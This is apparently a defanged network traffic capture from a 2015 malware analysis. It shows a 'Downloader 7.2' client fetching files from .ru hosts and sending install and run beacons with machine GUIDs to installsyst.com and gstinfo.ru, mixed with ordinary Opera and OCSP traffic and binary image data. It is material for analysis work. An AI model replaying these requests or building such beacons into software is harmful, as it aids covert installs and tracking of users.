lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS5 Macintosh" xmpMM:InstanceID="xmp.iid:33A52898E35C11E29B8BCA56
398416FA" xmpMM:DocumentID="xmp.did:33A52899E35C11E29B8BCA56398416FA"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:33A52896E35C11E29B
8BCA56398416FA" stRef:documentID="xmp.did:33A52897E35C11E29B8BCA563984
16FA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>........IDATx...i.m.u...>..s....\.^.....
I..%..R.l..,.."...#...v.8..._.8?....;.. @...dJ.@..&....M..7.5...<.i
g.{.s.m ...zU..=...............{.l............_../.|..Vg....L..{....w.
..aX]..k...l:kU..........O..v:....}y...w......2.I.........i.Z.ri..Z.&l
t;Oh.%......w;....................7..._...]ZY.T....(M...T.}..".?I..iR.
5.>y.?......Y.V;....O.......r.a..^..R.P.O.0..M.=.W...r..Y......B*.,
.oO %.'.\.'.........R*..B......}...'wn....T.....{......."......~.j=,..
...[.7........_.q.o.....)..........EZ$2..x.).._f.!.2lg.....O.........D
.u.K...?/..D....x.......~...G..>....TJ*."....|!..;..."N..7._.O.<<< skipped >>>

GET /Opera.png HTTP/1.1

User-Agent: Downloader 7.2

Host: illespi.dom-upload.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:31:05 GMT

Content-Type: image/png

Content-Length: 1853

Last-Modified: Wed, 02 Jul 2014 09:15:39 GMT

Connection: keep-alive

ETag: "53b3cdbb-73d"

Accept-Ranges: bytes
.PNG........IHDR... ... .....szz.....bKGD..............pHYs...........
......tIME.......6.......IDATX...].U....{.s.=sg..3....'.BlL......Ejk..
..B.O!.b./>.}........W!.!}...UH..jm....@....:....;.c...p.8.|DK!....
...o.....>..<...}..(..p.5`x...fg..Q.T..v...0.o..8.....wS...z4.-.
..]...I..^M>>Q.G.T.l}............p.K_>....ny...}...^Z-0.....(
.\.I.T.J.h.5.n...ON.......o?6....O. <[y. i...uf...Z......7.......i.
{..om.........L....._ ..........`l..'m\<......Y..z..A........,..1,G
v..o.~...m..i4...j._./....X.....7.}&...=....w.~.`.4.E]\... .'.....`...
7ON.>.h...q......w.)#w....LO.W.M...........'.....r..=_x......l....h
.21U3ik.....NN.^........P@D....:.B3.?.LO.z.a...n..{..t..l.0~n..s....-.
....... ...LM.Q.x.xEs.....u .......=..@.z........f.(*...k...aL....P...
.C....H[.4..jT...L....7v}qX..p..O..........![\....@.......m.m.G.....U-
D...znx.@&r".."..#y.H..z.8..<M.Tj..X..i.....{.wT.r...q_.\....~..R..
.;......A.....ng...^P...?x....r.L...Mx.@uw...4.x.1..nz(.........F...x.
`. h.D..K..{..Nt(........g..../.....<=V...zY.!.Y'.(..^uh.....F5..Ae
U.R/../O.......^..1.@...D*..VW........,[.r.....2^.:.c.....,...:..e.T.Y
...zmK.r/".=...40.|.xU' ..jt.. ...R_..U..$.e..;..S........_..^.P.."...
.O..$1Nul.@.z{...k.i..,....;@7<@..(.....r "....f.'..Z.\.j6.6D..^Y.c
.iU...`.A.Cu...ml.t..G....rn...F..t:..,... .....8.....}[.y.6.t.....[..
......].....CT....s...`x.......sd...D.D.....<........P..o.LQ.K..QEQ
..,. .b`...{......&..G..wq..4.}}.q|zb............v/..(\..].1..6.8....,
E= .~.E1...... .'..lx"r....&.K&.aTh..Q.<..U.0..^..~.a.K....Ap.\<<< skipped >>>

GET /res/servicefiles/sitepreference/siteprefs-desktop-1424440377.json HTTP/1.1

Host: get.geo.opera.com.global.prod.fastly.net

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Fri, 20 Feb 2015 13:52:57 GMT

Content-Length: 865

Accept-Ranges: bytes

Date: Mon, 23 Feb 2015 09:32:30 GMT

Via: 1.1 varnish

Age: 1819

Connection: keep-alive

X-Served-By: cache-ams4123-AMS

X-Cache: HIT

X-Cache-Hits: 459

X-Timer: S1424683950.934815,VS0,VE0

// Axkhsr0D5jgfvzVUb3UFl1rfDB/A3PpPKbZjO72k2uXKRLeMGwhoDLV/IjuL8anjbVU
7TnYKdOwGlPfxmYsTIGv/aMG4ttYuNq2xUwbfH9YAhWhexXYDKgMZJSKZUN1FA0ToQIoIh
ASPvfsmauVMkJ nnJJRaoc/SWpR23jTl2WjuMELLXOyfB4b0TEwljTuPl735mCG SWHBJV
Ls4kX0igEqS0iufljubWpFUG6fUOlE6wE5/jCYk8/yuvpekTKUayh M5GikUjRE trfeo3
iYV1mt7t2psHtj 1sWbg2vywUJ3HEWR/sUs5teymegVnOFR5SEoxuU8Q7XDuos6bA==.{"
@encoding":"UTF-8","@version":"1.0","preferences":{"config":{"useragen
t":[{"@value":"Mozilla/5.0 ($PLATFORM) AppleWebKit/537.36 (KHTML, like
 Gecko) Chrome/40.0.2214.94 Safari/537.36","@id":"32"},{"@value":"Mozi
lla/5.0 ($PLATFORM; rv:24.0) Gecko/20100101 Firefox/24.0 $OPR","@id":"
31"},{"@value":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Tri
dent/4.0)","@id":"34"}]},"@clean_all":"1","host":{"@name":"inbox.googl
e.com","section":{"pref":{"@value":"32","@name":"Spoof UserAgent ID"},
"@name":"User Agent"}}}}.HTTP/1.1 200 OK..Server: nginx..Content-Type:
 application/octet-stream..Last-Modified: Fri, 20 Feb 2015 13:52:57 GM
T..Content-Length: 865..Accept-Ranges: bytes..Date: Mon, 23 Feb 2015 0
9:32:30 GMT..Via: 1.1 varnish..Age: 1819..Connection: keep-alive..X-Se
rved-By: cache-ams4123-AMS..X-Cache: HIT..X-Cache-Hits: 459..X-Timer: 
S1424683950.934815,VS0,VE0..// Axkhsr0D5jgfvzVUb3UFl1rfDB/A3PpPKbZjO72
k2uXKRLeMGwhoDLV/IjuL8anjbVU7TnYKdOwGlPfxmYsTIGv/aMG4ttYuNq2xUwbfH9YAh
WhexXYDKgMZJSKZUN1FA0ToQIoIhASPvfsmauVMkJ nnJJRaoc/SWpR23jTl2WjuMELLXO
yfB4b0TEwljTuPl735mCG SWHBJVLs4kX0igEqS0iufljubWpFUG6fUOlE6wE5/jCYk8/y
uvpekTKUayh M5GikUjRE trfeo3iYV1mt7t2psHtj 1sWbg2vywUJ3HEWR/sUs5te

<<< skipped >>>

GET /file_error?type=download&descr=User abort (info event)&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:31:25 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:31:25 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

Set-Cookie: GSID=e6116d0ea7834f020e2d3ab696784df9; expires=Tue, 24-Feb-2015 09:31:25 GMT; path=/; domain=xml.profitraf.ru

GET /statistic/?status=run2&rand=938&GUID=127548203094016&browser=opera_27.0.1689.69 HTTP/1.1

Accept: */*

Accept-Language: en-us

Cache-Control: no-cash

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: installsyst.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:25 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

Cache-Control: no-cache

GIF89a.............!.......,...........L..;..

GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6dg== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: g.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1363

content-transfer-encoding: binary

Cache-Control: max-age=494677, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 02:53:01 GMT

Expires: Sun, 1 Mar 2015 02:53:01 GMT

Date: Mon, 23 Feb 2015 09:31:47 GMT

Connection: keep-alive
0..O......H0..D.. .....0.....50..10......7).nj./P(.3.\\.;.B....2015022
2025301Z0f0d0<0... ..........9.....yP..`...<.......*.A.....>U
....... ...:v....20150222025301Z....20150301025301Z0...*.H............
....T...q...f....-S.%c"X!....lj..~k....\.2.|R*....)..t..1. .2.G{&..q..
..G..*......f....0.Y..6..a%..5.(9..B:..M.(&./....WR..3,x.4.......X....
..p...8.....z.gy.=.....U?.....#.....F....U;....4..y...-_l.....&..8.5#.
.4q...95.G@..L_.;.VI.~=..e...\......Xkq. .#..e.....0...0..}0..e.......
.:}0...*.H........0B1.0...U....US1.0...U....GeoTrust Inc.1.0...U....Ge
oTrust Global CA0...141201130534Z..151216130534Z02100...U...'GeoTrust 
Global CA TGV OCSP Responder 30.."0...*.H.............0............\.h
pc..J.a.j-.t......F`Aw...)L.YE.2..~..-...2.Y(.".CZ.w..T..Y. syd.....x.
.YE..<....lwv.:J.76>U....uF.a.|8N.. ..1p...`f.X...B>x........
......6..m.&...'..W.plK....[.m.V..h..lI.........?~.....>.|'....o...
A!.Pm.*.N ...<.....3...*|.x._..1..m.W<*....._S.............0..0.
..U.#..0....z.h.....d..}.}e...N0... .....0......0...U.%..0... .......0
...U...........0...U.......0.0!..U....0...0.1.0...U....TGV-B-2830...*.
H.............~....2!...V..0...Y....L..k....z}~a.3Y.x..dS.L...Dk$a...n
R9_......B......m....Y....U.5....'.....<{....v&=.2].....j*.r(7...=.
.w.I...z....\.#.J.ac.....I.[.[....6.X....0...g.3d...z.i.H..f...v.....\
.....^.N..1.J<.)`Z.....4.-.E..n.E.~t....v.e.T...?. ......i..%....<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCECJe6gdYhONI6dBjwD1kE+o= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=474265, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 21:17:36 GMT

Expires: Sat, 28 Feb 2015 21:17:36 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
1211736Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U..."^..X..H..c.=d......20150221211736Z....20150228211736Z0...*.H.....
.........k....?y..G.M.....l..&.......m.....I|....uC.b3.Q..<Ta.{NP.I
R<............z....L.k..Q...q..;Q.`%.I..y.....,JS.-..2.#.....3.....
.].......{<.%.......@..m....d....M..'...z...6.nb.....2{d.-p.G7...?*
u0.......gNu...Q.!.k..Wv ...h.,...*j..1..........b..s....d.Y.n.....0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-..<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECEEDrVXFQCT2U83rWiGehg1Q= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: th.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1396

content-transfer-encoding: binary

Cache-Control: max-age=525112, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 11:23:18 GMT

Expires: Sun, 1 Mar 2015 11:23:18 GMT

Date: Mon, 23 Feb 2015 09:36:17 GMT

Connection: keep-alive
0..p......i0..e.. .....0.....V0..R0...............w/.|`....a...2015022
2112318Z0s0q0I0... ........l....r.vdv0..*.~Y..X....e?z.4..G.L.......q.
.@.UqP.=..z..g..T....20150222112318Z....20150301112318Z0...*.H........
.....~.[}Q./1..F4." ...r.p...Sn.V$.....Td.:.B..POE...<.#|.....~....
...2..`..!......'D....J._...V<s.80t.h.V.x...T.].w`...m@....'..e.qB.
A u..2..&.R ...R@4m...o\..]Z.......A....`M].i.:.\.....m....ePu..=.}..a
..MV..i.Pb.....,...(.....C..$N.$.....f.9....U.T@.2....XH.....0...0...0
..y.......x..wW.M..@5....80...*.H........0J1.0...U....US1.0...U....Tha
wte, Inc.1$0"..U....Thawte Code Signing CA - G20...141210000000Z..1503
10235959Z0Y1.0...U....US1.0...U....Thawte, Inc.1301..U...*Thawte Code 
Signing CA - G2 OCSP Responder0.."0...*.H.............0..........P....
.].8?e...8.0.. ...-.uP.3....pQ......mi..wVt.......<....{d.?..9..z%.
?..}.N`.V.........I.X...E#...*.f...X.;...75......%...n.%..#..T.<...
..fEQ.\\.f.{M.H...M..u...9~..C....B.o..........dc...V..,.........{...j
.9.xw?D..ooNf&=......D|.R..../.....So....*-5.......d0b0...U....0.0...U
.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U..
..TGV-B-25170...*.H.....................2.).xO...].6..R.k...H =d...L..
.(o0#.......<O#.;.b.@..l...^.q.Y...}....S(syt&...$..L..7<...nb|.
..]2c..q..Q.L.3,.............n>....tND..fJ.&. .....%7.....f.31.>
..d...ET.E.~.x...]N...*.......n......HI..*M..t.......:.=.:..(2M".S....
.&....................<<< skipped >>>

GET /speeddials/partner/booking_com_ua HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/booking_com_ua/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2724644830

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /previews/images/yandex_mail_ua/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "78734b-de0-50ecea1134600"

Content-Type: image/png

Content-Length: 3552

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2724644860 2724551465

Age: 270

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 7
.PNG........IHDR...............3.....sRGB.........IDATx...op\U.....6.M
....RF....&..C.*3.#6.N..l....c. N....R.FK...8.....#.....A...0....t.W..
a..@B.m.v=.n..&.&.g....9.M.....>....{..m.5Mh...W.b^eC2..@H.a2. .!..
.aQH....1.... L..BJ.@....xH.azX.R...d.@.C.........&c....@..... .0.....
....(.............E!%. L...<$.0=,.)A.a2. .!...aQH....1.... L..BJ.@.
...xH.azX.R...d.@.C.........&c....@..... .0.........(.............E!%.
 L...<$.0=,.)A.a2. .!...aQH....1.... L..BJ.@....xH.azX.R...d.@.C...
......&c....@..... .0.........(.............E!%. L...<$.0=,.)A.....
8.._..8.]@.H..\!A.9..qYH ..V...........4...bhzn.".|...,..f.|....F8....
...@.1..U...-....$.L.4u..S.qq.xk ..@...l.Nd...$.. . ...a....{.G.8..H..
Yw..1!....4|.QF]...5..xu...Y..F...68[$..H.jD9.*...S..............T.b..
Q.$..O ...O..0....}.(7!.o.8.)..#..e....).E..aF..t.`A ....`S.~.{..0.4.S
.e.R..\...\."....q~ &..#.8-L.3f.....GpZ.. ....(...1I...8......Q...[..y
SD.%yE8.x..bN'......*........Q.2..;...Z.6.6.#...{..qf.....wUp...?.....
S..L..._gn..{.V.Umv....DY.$pV...,E..}.^b.1sj{~u....<b..\..du..xA.:\
...nen.P...m~......I}k....*.b....uk*s........a..|.qcg.q..,...<...f.
..,.(.Zm{#.../;z.0K..0.....i.Z3.s.L 5r.:?b~.B.~...,.z.G..1..7.6...|...
.).....~.e.......b.A.....3..v..7.Qr.q&..`..<..4[....L..z.n4...2.|..
.4/.d..W..-...3...F..t6..nC...f.....F..?l/..L.l......L..6.P.cf.P.! .X.
..~.....1..G.lN...";..0..r....9q.8........a.^...........f.Rj.......~Q.
 ...W.o.........>c...C...!R..1#.]~.....R.v.,......h.....Z.C...?G...
.9...S.....F...V.P..SYe.....C.D9......T...(;.V..D...S....GGs.(U.Ls<<< skipped >>>

GET /previews/images/aukro_ua/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "3a90bc-164e-50ecea1134600"

Content-Type: image/png

Content-Length: 5710

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2598683003 2598632818

Age: 144

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 28
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:B4DF
D05FBED111E28F85D5EC1B7B836C" xmpMM:InstanceID="xmp.iid:B4DFD05EBED111
E28F85D5EC1B7B836C" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:098011740720681180
83C1680B1A71F7" stRef:documentID="xmp.did:4905A1941A226811822A85CA6146
66AF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>3s ....|IDATx....p.e..........x.<.=...zg
..q.q<:..$.@.)@(RB.f.5.#HS..D. ......A.R. @....M6........9...Nf....
.....<..ABQ.)...("KQD...,Ed)..R....,E.Y."....("KQD."..Ed)..RD...,E.
Y..R...("K.Y."..Ed)"KQD...,Ed)..R...("K.Y."..Ed)"KQD...,Ed)..R....,E.Y
."....("KQD."..Ed)..RD...,E.Y..R...("K.Y."..Ed B.....r|..T..|H.]%.D6P.
v.4....I....._O. .D6P.UwiTM...A..=.........{L.F.Y"Kd)"Kd)"Kd.,...,...,
.%.N*.*....Kr.@.]...j..e.RM...x.....^S.....@.. ........\...U[...-....^
..1_.......l...H..,G.Kv...)Y...?..5.......)2o...U..V7....s.. ..u..<<< skipped >>>

GET /speeddials/partner/twitter_us HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/twitter_us/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2724563521

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /previews/images/amazon_us/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "364a9b-142d-50ecea1134600"

Content-Type: image/png

Content-Length: 5165

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2598601678 2598550509

Age: 152

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 90
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:3185
2996BED711E28F85D5EC1B7B836C" xmpMM:InstanceID="xmp.iid:31852995BED711
E28F85D5EC1B7B836C" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:907021171320681180
83C1680B1A71F7" stRef:documentID="xmp.did:4905A1941A226811822A85CA6146
66AF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>.../...[IDATx.....TU........A.YPY.....$.B@P
...E..Z. .."HF....!#..C...$...t..#.$.0w.gO..y....{.x....eQp.......s.}F
).. Eq.("KQD...,Ed)..R....,E.Y."....("KQD."..Ed)..RD...,E.Y..R...("K.Y
."..Ed)"KQD...,Ed)..R...("K.Y."..Ed)"KQD...,Ed)..R....,E.Y."....("KQD.
"..Ed)..RD...,E.Y..R...("K.Y."..Ed)..RD......./..;.s...j.*Z.h.|.....g.
....6l.../...u..zn...{J.={.\...S#G.|..._|........G...OHH..v...1c....;.
.7~....t..t..[.n...c..EGG.i..J.*.>.`..9...y.>....v...G..uS....~.
I;w..s.N..O.>=u.Tt.E../..........?..w.S..e.-.u.......l....../w.<<< skipped >>>

GET /previews/images/product/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "72e10b-5168-50ecea1134600"

Content-Type: image/png

Content-Length: 20840

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2724563570 2724509589

Age: 160

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 172
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:6BA9
EB1F6CCD11E38B6BA9BE3DED1FED" xmpMM:InstanceID="xmp.iid:6BA9EB1E6CCD11
E38B6BA9BE3DED1FED" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)"&g
t; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:eb89270f-6547-4d76-
9b6b-f3a5ab54ecc0" stRef:documentID="xmp.did:4905A1941A226811822A85CA6
14666AF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta
> <?xpacket end="r"?>..9...M.IDATx..}.`.......M]..,.......;..
..!.H!.....*i/.. ....B.B.....;....7.H.%..z.6...sB....ll.gqwZ........&g
t;....ct|v................c...c...ct.Bvt.v.....lm..A.....H..{'..NP....
..J0w,..F!;:...e.Q#x..li.J.7..`.Xp.4pf-..Q...........s ....EN..s..3...
........<..t....J/..t..j...c.. .GW.Ww.r.W...:...Q...B.P.|.ub`.|L,..
..h.......mQp...31\..J.C..1.Q...B.....2......y....e.Q...!;.n]...F.X.J.
j.*7.3......... ..{.#..].?....X{...oD..F=9..b0:.3..\.,.I..q.=.._<Z.
^.R..4^. .^!~A....t...w.J..1.!.....|.!..H.5..Qeg.RA,#.M?..........<<< skipped >>>

HEAD /?prod=shortcutmaker&version=1.0.0.113&action=set_shortcut_success&guid=BF8501D34E71C08CCE258C678D1C6C1C&mid=BF8501D34E71C08CCE258C678D1C6C1C&os=6.1&bit=64&sig=7c01ff2c1ae698a011886c728c9d1fe1&guid=140C363D39D3429482E45C1A8EB2CC99 HTTP/1.1

Host: gstinfo.ru

Accept: */*


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:36:14 GMT

Content-Type: : text/plain

Content-Length: 3

Connection: keep-alive

GET //MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CBwgH+WTEf6I= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:38 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=114395, public, no-transform, must-revalidate

Last-Modified: Mon, 23 Feb 2015 07:02:34 GMT

